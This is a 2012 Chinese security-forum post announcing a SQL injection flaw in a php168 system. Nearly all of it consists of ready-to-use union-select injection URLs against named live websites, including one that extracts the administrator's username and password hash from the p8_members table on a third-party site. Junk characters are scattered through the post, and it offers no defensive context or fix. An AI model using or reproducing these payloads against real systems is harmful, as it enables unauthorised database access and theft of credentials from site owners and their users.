找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2974|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
. N% l1 k# m2 C! ]$ }  z8 D                                                         , ^2 T) v7 |/ T( d" `7 {9 W
                                       
2 s3 ?5 N. C( Q1 d+ z5 w# b1 v) Y# S1 ]. ]: N8 |/ h* h$ C& p2 I
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
. c" l) u' ~4 K; c0 D# s# r                                                     " o. h! M4 i( M6 T" v
                                                                     ?- E3 j1 F: U9 k" J6 a7 k
                                                        7 ~2 k. B9 l3 Z4 {8 ]: {
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--0 Q% R4 O3 v& x3 x
4 c6 p, |# }( U( m7 j5 U) Y

5 j& i  d$ n/ N! e  g: F3 O# L( i* `1 D9 W- J
                                                            
% Y* T. y! H1 O0 _
3 f) A3 i+ l, a' ~# n6 z8 ihttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--: Z7 x* m) R$ {

- V" a4 j$ S' n" |& j7 ]# W$ j6 E2 g2 U) p1 @

+ A% u9 @* v: }  j, o                                                                    
* }) Z* c' M( X7 w2 q

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表